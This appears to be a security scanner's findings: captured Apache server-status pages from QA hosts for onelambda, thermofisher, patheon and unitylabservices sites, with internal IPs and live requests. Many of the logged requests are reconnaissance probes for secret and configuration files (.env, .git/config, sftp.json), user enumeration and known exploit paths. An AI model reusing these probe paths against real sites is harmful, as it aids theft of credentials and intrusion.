Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.56 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Mar 15 2023 20:56:52 Current Time: Thursday, 11-May-2023 06:45:06 EDT Restart Time: Tuesday, 09-May-2023 17:47:59 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 12 hours 57 minutes 7 seconds Server load: 0.08 0.02 0.01 Total accesses: 40183 - Total Traffic: 406.9 MB - Total Duration: 1974397 CPU Usage: u11.04 s16.06 cu37.13 cs10.32 - .056% CPU load .302 requests/sec - 3206 B/second - 10.4 kB/request - 49.1351 ms/request 41 requests currently being processed, 34 idle workers WKKKK_K_R_KWR_K_______R_R___RRRR__R__R__RR__R____KR_______.RK.RR R.RRR.RR.RK..RRR...................................RR........... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-03154617/21/233W 0.01002219522.00.036.79 10.253.106.133http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 1-0414424/24/186K 0.0207381932.80.031.27 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.env HTTP/1.1 2-0293913303/13303/13303K 7.8840789820127.919.6619.66 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0294013303/13303/13303K 7.2040740520127.919.6619.66 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 4-041454/4/164K 0.00110311105.90.013.15 10.253.106.167http/1.1www-qa.patheon.jp:80GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 5-016750/14/186_ 0.0123196680.00.021.38 10.253.106.133http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 6-03155011/13/232K 0.01231603620.00.022.76 10.253.106.167http/1.1www-qa.patheon.kr:80GET /server-status HTTP/1.1 7-0246320/11/179_ 0.012531090.00.035.60 10.253.106.167http/1.1www-qa.patheon.kr:80GET /.git/config HTTP/1.1 8-016810/0/210R 0.006700153590.00.004.49 10.253.106.133http/1.1 9-041460/2/226_ 0.00111209190.00.004.14 10.253.106.133http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 10-01804516/42/233K 0.26002321521.10.912.04 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 11-041477/7/197W 0.00002881910.90.012.19 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /.vscode/sftp.json HTTP/1.1 12-0315560/16/184R 0.006700219860.00.044.66 10.253.106.167http/1.1 13-041480/0/262_ 0.0030438960.00.002.32 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 14-041495/5/204K 0.00010497696.10.011.74 10.253.106.133http/1.1www-qa.patheon.cn:80GET /telescope/requests HTTP/1.1 15-0327570/32/244_ 0.05125100840.00.139.04 10.253.106.167http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 16-017760/33/262_ 0.02040102760.00.043.42 10.253.106.133http/1.1www-qa.patheon.cn:80GET /.git/config HTTP/1.1 17-041500/0/143_ 0.0030291970.00.002.13 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 18-041540/0/187_ 0.0020254780.00.006.38 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 19-0327590/5/137_ 0.001022630.00.001.26 10.253.106.167http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 20-041550/0/160_ 0.0020270590.00.003.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 21-041560/0/170_ 0.002030850.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 22-017890/0/163R 0.00670041670.00.002.26 10.253.106.133http/1.1 23-041570/0/176_ 0.0020153860.00.005.56 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 24-0283220/9/224R 0.027011797100.00.182.70 10.253.106.167http/1.1 25-041580/0/175_ 0.0020326180.00.002.05 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 26-041590/0/170_ 0.0020339800.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-041600/0/272_ 0.0020360040.00.0016.18 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-023220/2/139R 0.0012343889728360.00.151.94 10.253.106.167http/1.1 29-0296010/22/222R 0.029750144790.01.223.39 10.253.106.167http/1.1 30-0327600/0/247R 0.00670083480.00.0010.55 10.253.106.133http/1.1 31-0288110/2/205R 0.007014146860.00.004.57 10.253.106.167http/1.1 32-041610/0/218_ 0.0020267330.00.0022.42 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-041620/0/247_ 0.0010245750.00.003.49 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 34-0320970/1/221R 0.00717067230.00.009.95 10.253.106.133http/1.1 35-041630/0/163_ 0.0010313290.00.004.76 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 36-041640/0/200_ 0.001042240.00.002.58 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 37-0288260/24/232R 0.049708802580630.00.12102.29 10.253.106.133http/1.1 38-041650/0/146_ 0.001087990.00.001.62 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 39-041660/0/173_ 0.0010297760.00.001.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 40-04860/8/193R 0.006700164090.00.013.48 10.253.106.133http/1.1 41-023230/5/153R 0.0497510197100.00.131.58 10.253.106.167http/1.1 42-023240/36/151_ 0.0335192190.00.060.81 10.253.106.167http/1.1qa1-chemicals.thermofisher.co.kGET /.git/config HTTP/1.1 43-041670/0/156_ 0.001089950.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 44-023250/1/158R 0.0010326715342510.00.021.73 10.253.106.133http/1.1 45-041680/0/170_ 0.0010446410.00.002.90 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 46-023260/22/239_ 0.02138280510.00.241.49 10.253.106.133http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 47-041690/0/139_ 0.0010446900.00.002.53 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-041700/0/105_ 0.0010216720.00.000.91 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 49-0200771/12/200K 0.0250191460.90.443.84 10.253.106.167http/1.1www-qa.patheon.jp:80GET / HTTP/1.1 50-0321120/0/184R 0.00717058470.00.002.23 10.253.106.167http/1.1 51-041710/0/194_ 0.0010421000.00.003.67 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 52-041720/0/156_ 0.001036400
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1ddca6d3d8
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:44 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 18 seconds Server load: 0.07 0.02 0.00 Total accesses: 31430 - Total Traffic: 623.2 MB - Total Duration: 570261 CPU Usage: u7.12 s13.11 cu34.85 cs7.75 - .0595% CPU load .297 requests/sec - 6.0 kB/second - 20.3 kB/request - 18.1438 ms/request 40 requests currently being processed, 25 idle workers _KKRRR_RRR_RRRW_R_RRR_KRRR__R_K__WRRR__RWKK_____K__RR__R_R_RR_.. ..RRR........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103080/32/164_ 0.05126037180.00.200.87 10.253.106.215http/1.1 1-0383810568/10568/10568K 4.9850496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1950611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00530082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00835057860.00.001.95 10.253.106.215http/1.1 5-0134510/10/325R 0.002530111870.00.430.92 10.253.106.141http/1.1 6-0130770/13/139_ 0.011261324680.00.052.13 10.253.106.215http/1.1 7-0128580/6/134R 0.00571023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00815041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00253141124480.00.013.42 10.253.106.141http/1.1 10-0145380/0/144_ 0.004049420.00.001.15 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 11-0134520/6/129R 0.00510040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00794033270.00.001.09 10.253.106.141http/1.1 13-0135070/0/149R 0.00571085980.00.001.24 10.253.106.141http/1.1 14-0136377/7/156W 0.0100310946.00.041.08 10.253.106.141http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 15-0145400/0/145_ 0.003055200.00.004.17 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 16-0101570/7/178R 0.015301497170.00.0614.27 10.253.106.215http/1.1 17-0139600/0/117_ 0.00253083870.00.001.46 10.253.106.141http/1.1 18-0130800/1/171R 0.00253124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015103120930.00.832.81 10.253.106.141http/1.1 20-098240/11/99R 0.012664147990.00.061.77 10.253.106.215http/1.1 21-0130810/2/133_ 0.00247030660.00.011.40 10.253.106.141http/1.1 22-0116971/5/110K 0.014071231.00.050.66 10.253.106.215http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 23-0140240/0/122R 0.007940102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00494051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00831050960.00.002.54 10.253.106.215http/1.1 26-0145410/0/77_ 0.00307710.00.000.39 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 27-0145420/0/179_ 0.0020181790.00.002.61 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 28-0139630/1/152R 0.004880182700.00.003.22 10.253.106.215http/1.1 29-0145430/0/160_ 0.0020137030.00.00203.31 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 30-01308515/16/101K 0.0200314458.60.061.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 31-0145440/0/114_ 0.002017200.00.001.02 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 32-0145450/0/152_ 0.0020167330.00.001.79 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 33-090631/34/148W 0.020059720.90.200.98 10.253.106.215http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 34-0130870/0/117R 0.008350138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007940147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00777029700.00.0020.89 10.253.106.215http/1.1 37-0139640/9/104_ 0.01126094560.00.03194.54 10.253.106.215http/1.1 38-0132800/2/105_ 0.002534123290.00.001.22 10.253.106.141http/1.1qa1.onelambda.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 39-0140270/0/115R 0.00777031160.00.001.38 10.253.106.215http/1.1 40-0139651/2/237W 0.200091911.40.391.69 10.253.106.215http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 41-0132821/1/136K 0.000058950.90.002.12 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 42-0139661/2/134K 0.000050360.90.001.58 10.253.106.215http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 43-0132830/3/205_ 0.01247068630.00.045.08 10.253.106.141http/1.1qa1.onelambda.com:80GET /en/home.html HTTP/1.1 44-0145460/0/160_ 0.001063650.00.009.75 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 45-0139680/0/140_ 0.001260187110.00.001.83 10.253.106.215http/1.1 46-0145470/0/164_ 0.001040000.00.002.20 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 47-0145480/0/107_ 0.001028370.00.000.72 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 48-0118872/34/129K 0.2200226382.50.841.08 10.253.106.215http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 49-0139690/0/88_ 0.00123056490.00.000.76 10.253.106.215http/1.1 50-0139700/0/98_ 0.00123031740.00.000.24 10.253.106.215http/1.1 51-0139710/0/87R 0.00978055920.00.005.78 10.253.106.141http/1.1 52-0139720/0/140R 0.00978017750.00.001.03 10.253.106.141http/1.1 53-0145490/0/149_ 0.001075920.00.006.93 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 54-0145500/0/156_ 0.001095190.00.003.50 127.0.0.1http/1.1qa1-chemicals.thermofisher.co.kOPTIONS * HTTP/1.0 55-0139730/2/125
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d2f0e3cf1
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Friday, 14-Apr-2023 16:46:44 EDT Restart Time: Thursday, 13-Apr-2023 11:25:25 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 1 day 5 hours 21 minutes 18 seconds Server load: 0.06 0.02 0.00 Total accesses: 31485 - Total Traffic: 623.3 MB - Total Duration: 572823 CPU Usage: u7.15 s13.11 cu34.85 cs7.75 - .0595% CPU load .298 requests/sec - 6.0 kB/second - 20.3 kB/request - 18.1935 ms/request 65 requests currently being processed, 0 idle workers KKKRRRKRRRKRRRKKRWRRKKKRRRKKKKKRWKRRRKKRKRKKWKKRKKKRRRKRRRWRRR.. ..RRR........................................................... ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0103081/33/165K 0.0504037990.80.200.87 10.253.106.215http/1.1qa1.onelambda.com:80GET /debug/default/view?panel=config HTTP/1.1 1-0383810568/10568/10568K 4.9850496815966.415.5915.59 10.253.106.141http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 2-0383910568/10568/10568K 6.1950611015966.315.5915.59 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET /server-status?auto HTTP/1.1 3-0134500/0/196R 0.00530082210.00.002.48 10.253.106.141http/1.1 4-0136360/1/169R 0.00835057860.00.001.95 10.253.106.215http/1.1 5-0134510/10/325R 0.002530111870.00.430.92 10.253.106.141http/1.1 6-0130771/14/140K 0.010624810.70.052.13 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.vscode/sftp.json HTTP/1.1 7-0128580/6/134R 0.00571023960.00.011.33 10.253.106.215http/1.1 8-0140220/0/129R 0.00815041440.00.002.57 10.253.106.215http/1.1 9-0132680/1/199R 0.00253141124480.00.013.42 10.253.106.141http/1.1 10-0145381/1/145K 0.000349484.50.001.15 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /server-status HTTP/1.1 11-0134520/6/129R 0.00510040440.01.292.74 10.253.106.141http/1.1 12-0140230/0/120R 0.00794033270.00.001.09 10.253.106.141http/1.1 13-0135070/0/149R 0.00571085980.00.001.24 10.253.106.141http/1.1 14-01363711/11/160K 0.02041343148.90.051.08 10.253.106.141http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 15-0145402/2/147K 0.0004056821.60.004.17 10.253.106.215http/1.1qa1.onelambda.com:80GET /config.json HTTP/1.1 16-0101570/7/178R 0.015301497170.00.0614.27 10.253.106.215http/1.1 17-0139600/0/117W 0.000083870.00.001.46 10.253.106.141http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 18-0130800/1/171R 0.00253124155790.00.022.37 10.253.106.141http/1.1 19-0120780/5/155R 0.015103120930.00.832.81 10.253.106.141http/1.1 20-098241/13/101K 0.010048001.00.061.78 10.253.106.141http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 21-0130811/3/134K 0.0003831420.70.011.40 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 22-0116974/8/113K 0.010072213.40.060.67 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 23-0140240/0/122R 0.007940102190.00.001.48 10.253.106.141http/1.1 24-0139610/0/146R 0.00494051050.00.005.36 10.253.106.141http/1.1 25-0136380/0/105R 0.00831050960.00.002.54 10.253.106.215http/1.1 26-0145411/1/78K 0.000117951.50.000.39 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 27-0145422/2/181K 0.00040182872.50.002.61 10.253.106.215http/1.1qa1.onelambda.com:80GET /v2/_catalog HTTP/1.1 28-0139631/2/153K 0.00040183500.80.003.22 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 29-0145431/1/161K 0.0007137180.70.00203.31 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /.env HTTP/1.1 30-01308516/17/102K 0.02038322059.20.061.15 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.env HTTP/1.1 31-0145440/0/114R 0.002017200.00.001.02 10.253.106.215http/1.1 32-0145450/1/153W 0.0000167330.00.001.79 10.253.106.141http/1.1qa1.onelambda.com:80GET /s/2343e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 33-090633/36/150K 0.0303861272.30.200.98 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /.DS_Store HTTP/1.1 34-0130870/0/117R 0.008350138960.00.001.46 10.253.106.141http/1.1 35-0140250/0/190R 0.007940147040.00.004.24 10.253.106.215http/1.1 36-0140260/0/121R 0.00777029700.00.0020.89 10.253.106.215http/1.1 37-0139641/10/105K 0.010094571.00.03194.55 10.253.106.215http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 38-0132801/3/106K 0.0003824060.70.001.22 10.253.106.215http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 39-0140270/0/115R 0.00777031160.00.001.38 10.253.106.215http/1.1 40-0139656/7/242K 0.2104094128.90.401.70 10.253.106.215http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 41-0132820/5/140R 0.000059760.00.002.12 10.253.106.141http/1.1 42-0139666/7/139K 0.0004053276.00.011.58 10.253.106.215http/1.1qa1.onelambda.com:80GET /api/search?folderIds=0 HTTP/1.1 43-0132832/5/207K 0.0104070231.50.045.08 10.253.106.215http/1.1qa1.onelambda.com:80GET /login.action HTTP/1.1 44-0145460/1/161W 0.000063650.00.009.75 10.253.106.141http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 45-0139681/1/141K 0.00012187361.30.001.83 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /debug/default/view?panel=config HTTP/1.1 46-0145472/2/166K 0.000040811.70.002.21 10.253.106.215http/1.1qa1-chemicals.thermofisher.co.kGET / HTTP/1.1 47-0145480/0/107R 0.001028370.00.000.72 10.253.106.215http/1.1 48-0118877/39/134K 0.22002280510.50.841.08 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET /?rest_route=/wp/v2/users/ HTTP/1.1 49-0139691/1/89K 0.000056491.10.000.77 10.253.106.215http/1.1qa1-corporate.thermofisher.com:GET / HTTP/1.1 50-0139702/2/100K 0.0003933341.60.000.24 10.253.106.215http/1.1qa1.onelambda.com:80GET /about HTTP/1.1 51-0139710/0/87R 0.00978055920.00.005.78 10.253.106.141http/1.1 52-0139720/0/140R 0.00978017750.00.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1d420b1711
Apache Status Apache Server Status for qa1.onelambda.com (via 10.253.99.247) Server Version: Apache/2.4.54 (Amazon) Communique/4.2.0 OpenSSL/1.0.2k-fips Server MPM: prefork Server Built: Jul 11 2022 21:47:38 Current Time: Thursday, 16-Mar-2023 07:20:17 EDT Restart Time: Wednesday, 15-Mar-2023 17:19:06 EDT Parent Server Config. Generation: 1 Parent Server MPM Generation: 0 Server uptime: 14 hours 1 minute 11 seconds Server load: 0.00 0.00 0.00 Total accesses: 14047 - Total Traffic: 115.1 MB - Total Duration: 286788 CPU Usage: u3.7 s6.68 cu20.89 cs2.54 - .067% CPU load .278 requests/sec - 2392 B/second - 8.4 kB/request - 20.4163 ms/request 61 requests currently being processed, 15 idle workers .R..KRWK.KRRR.KKK_RKWWK_WW_KRK_WKRRRKR.RWRRRK_RRRRRRRRRRR_R_RRR_ __KRRK_KRRK_RR__W_.............................................. ................................................................ ................................................................ ................................................................ ................................................................ ................................................................ .................................................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-0-0/0/91. 0.0058068020.00.002.12 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 1-099570/20/66R 0.04604082490.00.150.93 10.253.106.224http/1.1 2-0-0/0/77. 0.0028092420.00.001.34 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 3-0-0/0/78. 0.0029037680.00.002.72 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 4-016225047/5047/5047K 2.859029307617.87.447.44 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 5-0150910/23/52R 0.0597016712020.00.260.36 10.253.106.249http/1.1 6-0205910/0/74W 0.000014960.00.000.91 10.253.106.249http/1.1qa1.onelambda.com:80GET /info.php HTTP/1.1 7-016255047/5047/5047K 2.882029567618.77.447.44 10.253.106.224http/1.1qa1-corporate.thermofisher.com:GET /server-status?auto HTTP/1.1 8-0-0/0/56. 0.005908020.00.000.18 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 9-0180404/20/56K 0.0692020624.10.821.40 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 10-0166760/12/54R 0.20909022020.00.771.95 10.253.106.249http/1.1 11-0180410/1/47R 0.00666837500.00.001.49 10.253.106.224http/1.1 12-0180420/0/121R 0.006660486950.00.004.30 10.253.106.224http/1.1 13-0-0/0/66. 0.0060016430.00.001.19 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 14-0205923/3/38K 0.0004114302.30.000.56 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.vscode/sftp.json HTTP/1.1 15-0205933/3/69K 0.0004012472.20.000.92 10.253.106.249http/1.1qa1.onelambda.com:80GET /.env HTTP/1.1 16-0205941/1/79K 0.000057091.10.000.87 10.253.106.249http/1.1qa1.unitylabservices.com:80GET / HTTP/1.1 17-0206420/2/47_ 0.0004330510.00.002.41 10.253.106.249http/1.1qa1-corporate.thermofisher.com:GET /.git/config HTTP/1.1 18-0167250/2/56R 0.00666018600.00.011.42 10.253.106.224http/1.1 19-0136623/6/47K 0.0066206158355.50.060.93 10.253.106.224http/1.1www-qa.patheon.com:80GET /us/en/home2.html?at_preview_token=YB7l-F-q8CWNxAl21L6Zog&a 20-0206432/2/34W 0.000047475.00.000.26 10.253.106.249http/1.1qa1.onelambda.com:80GET /s/3333e2738313e26313e223/_/;/META-INF/maven/com.atlassian. 21-0206440/0/49W 0.000019390.00.001.84 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /debug/default/view?panel=config HTTP/1.1 22-0183301/1/60K 0.00678150119.20.020.54 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 23-0206460/1/43_ 0.000020960.00.000.40 10.253.106.249http/1.1qa1.onelambda.com:80GET /.git/config HTTP/1.1 24-0206470/0/64W 0.000013940.00.000.92 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /telescope/requests HTTP/1.1 25-0206480/0/54W 0.000056810.00.000.50 10.253.106.249http/1.1qa1.onelambda.com:80GET /.vscode/sftp.json HTTP/1.1 26-0206490/1/65_ 0.000028480.00.001.16 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 27-0206501/1/53K 0.000089381.00.001.44 10.253.106.249http/1.1qa1.onelambda.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1 28-0116190/3/34R 0.0097004160.00.000.09 10.253.106.249http/1.1 29-01931261/62/111K 0.060419072138.20.141.17 10.253.106.249http/1.1qa1.onelambda.com:80GET /.DS_Store HTTP/1.1 30-0167320/12/81_ 0.010035020.00.091.30 10.253.106.249http/1.1qa1.unitylabservices.com:80GET /.git/config HTTP/1.1 31-0167337/28/81W 0.150066446.70.542.24 10.253.106.249http/1.1qa1.onelambda.com:80GET /telescope/requests HTTP/1.1 32-0154412/4/36K 0.0067862339.50.040.20 10.253.106.224http/1.1www-qa.patheon.com:80GET /etc.clientlibs/multisitecommons/clientlibs/clientlib-base/ 33-0193130/2/61R 0.18866470480.00.411.07 10.253.106.249http/1.1 34-0193140/2/47R 0.00866348210.00.001.03 10.253.106.249http/1.1 35-0193150/0/67R 0.00866014000.00.000.64 10.253.106.249http/1.1 36-0206511/1/56K 0.000095091.10.000.69 10.253.106.249http/1.1qa1.onelambda.com:80GET / HTTP/1.1 37-0206520/0/82R 0.0064042870.00.001.73 10.253.106.249http/1.1 38-0-0/0/76. 0.0061033450.00.002.21 127.0.0.1http/1.1qa1-corporate.thermofisher.com:OPTIONS * HTTP/1.0 39-0206530/0/30R 0.006402930.00.000.12 10.253.106.249http/1.1 40-0206540/0/38W 0.000012690.00.000.53 10.253.106.249http/1.1qa1.onelambda.com:80GET /server-status HTTP/1.1 41-0206550/0/76R 0.0064048140.00.002.75 10.253.106.249http/1.1 42-0193160/0/34R 0.00866010200.00.000.97 10.253.106.249http/1.1 43-0193170/4/50R 0.00861321020.00.010.72 10.253.106.249http/1.1 44-0193181/1/50K 0.00671711221390.60.091.19 10.253.106.224http/1.1www-qa.patheon.com:80GET /akamai/sureroute-test-object.html HTTP/1.1 45-0116280/23/48_ 0.023108950.00.100.45 10.253.106.249http/1.1 46-0193190/0/15R 0.0086603870.00.000.03 10.253.106.249http/1.1 47-0206560/0/74R 0.0064053790.00.001.41 10.253.106.249http/1.1 48-0206570/0/25R 0.006402270.00.000.04 10.253.106.249http/1.1 49-0193200/0/25R 0.0086601310.00.000.07 10.253.106.249http/1.1 50-0206580/0/47R 0.0063052170.00.000.82 10.253.106.249http/1.1 51-0193210/0/34R 0.00861020950.00.000.35 10.253.106.249http/1.1 52-0206590/0/34R 0.0063017740.00.000.47 10.253.106.249http/1.1 53-0206600/0/33R 0.00<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3100acbc1d00acbc1dd0cd8d6d
